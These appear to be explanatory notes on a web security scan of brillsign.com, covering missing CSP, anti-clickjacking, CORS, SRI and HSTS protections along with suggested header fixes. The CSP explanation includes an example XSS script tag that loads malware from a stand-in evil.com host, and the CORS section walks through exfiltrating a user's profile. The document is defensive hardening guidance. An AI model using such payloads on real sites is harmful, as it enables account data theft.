Alert	Risk	Detail
Cross-Domain Misconfiguration	Medium	CORS policy possibly too permissive — check which origins are allowed
Retrieved from Cache	Info	Some responses cached by browser/proxy — low concern

10 alerts total — 4 Medium, 2 Low, 4 Informational. No High-risk issues.
Key Medium-risk findings:
- No CSP Header — XSS risk;
 (CSP Header Not Set means the server doesn't send a Content-Security-Policy HTTP response header, so browsers allow any scripts/resources to load — making XSS attacks much easier.
To fix: Add a Content-Security-Policy header to your server's responses. A reasonable starting policy:
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com; img-src 'self' https://images.unsplash.com https://www.vectorlogo.zone; connect-src 'self'
This would:
- Allow scripts & resources only from your own origin ('self')
- Allow styles from fonts.googleapis.com (since ZAP saw requests there)
- Allow fonts from fonts.gstatic.com
- Allow images from Unsplash and Vectorlogo.zone (external images the report shows being loaded)
)

 no Content Security Policy to restrict what scripts/ resources can load
- Missing Anti-clickjacking Header — The site can be embedded in an iframe (clickjacking risk)
(
CSP (Content Security Policy)
Without a CSP header, the browser trusts any script, style, or resource the page tries to load. 
If an attacker finds an XSS hole (e.g., injects a <script src="https://evil.com/malware.js"> into a comment or URL parameter),
 the browser happily loads and executes it. CSP lets you whitelist exactly where resources can come from — script-src 'self' blocks everything except scripts from your own domain.
Missing Anti-clickjacking Header
Without X-Frame-Options: DENY (or SAMEORIGIN) or a Content-Security-Policy: frame-ancestors 'none' directive,
 an attacker can load your site inside a hidden <iframe> on their malicious page. The user thinks they're clicking the attacker's UI,
 but they're actually clicking your site's buttons (e.g., "Delete Account", "Transfer Funds", "Change Password"). This is clickjacking — the attacker "hijacks" 
clicks by framing your transparent page over their fake buttons.
)

- Cross-Domain Misconfiguration (CORS) — Permissive cross-origin policy may allow data access from other sites

(
CORS (Cross-Origin Resource Sharing) is a browser mechanism that lets a server declare which other origins are allowed to read its responses. 
A misconfiguration means the server sends an overly permissive header like:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
This tells the browser: "any website can make authenticated requests to brillsign.com and read the response."
 So an attacker could host evil.com, trick a logged-in user to visit it, and that page's JavaScript can fetch https://brillsign.com/api/user/profile — the browser sees
 the permissive CORS header and allows evil.com to read the response, exfiltrating the user's data.
The fix: Only allow specific, trusted origins:
Access-Control-Allow-Origin: https://your-trusted-frontend.com
Or if no other site needs to read your API, don't send CORS headers at all (or send Access-Control-Allow-Origin: null for resource requests only from the same origin).
)


- Missing Subresource Integrity (SRI) — External JS/CSS loaded without integrity hashes (supply-chain tampering risk) 
(
SRI (Subresource Integrity) uses a cryptographic hash to verify that an externally hosted file hasn't been modified. You add an integrity attribute to <script> or <link> tags:
<script src="https://cdn.example.com/lib.js" integrity="sha384-abc123..."></script>
Without it: If the CDN hosting that library gets compromised (e.g., someone hacks cdnjs, unpkg, or a jQuery CDN account),
 they can replace the legitimate JS file with malicious code. Your site would load and execute the tampered script — giving the attacker full control over every page that includes it. 
Users never notice because the URL stays the same.
The fix: Calculate the sha384 or sha512 hash of each external file and add it as the integrity attribute. 
Browsers will refuse to execute the file if its hash doesn't match — even if the CDN is compromised.
)

Low-risk:
- No HSTS — No Strict-Transport-Security header (downgrade attacks possible)

(
HSTS (HTTP Strict-Transport-Security) tells the browser to only connect to your site over HTTPS, never plain HTTP.
Strict-Transport-Security: max-age=31536000; includeSubDomains
Without it, a downgrade attack works like this:
1. User types brillsign.com or clicks a link (or has a bookmark from before they used HTTPS)
2. Browser tries http://brillsign.com first (default)
3. Attacker on the same network (e.g., coffee shop WiFi) intercepts that HTTP request with a man-in-the-middle attack
4. Attacker responds with a fake page or redirects to a phishing site — or just strips out all the HTTPS links, keeping the user on plain HTTP
5. User never notices, attacker sees all traffic in plaintext (passwords, cookies, etc.)
This is called SSL stripping.
The fix:
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
- max-age = how long (in seconds) to remember "HTTPS only"
- includeSubDomains = applies to all subdomains too
- preload = you can also submit your domain to browser's HSTS preload list so even the first visit is forced to HTTPS
)

- Missing X-Content-Type-Options — Browser may MIME-sniff, enabling script-injection in non-script responses
Informational:
- Suspicious comments in HTML source, cache-control issues, modern web app fingerprint, and cached responses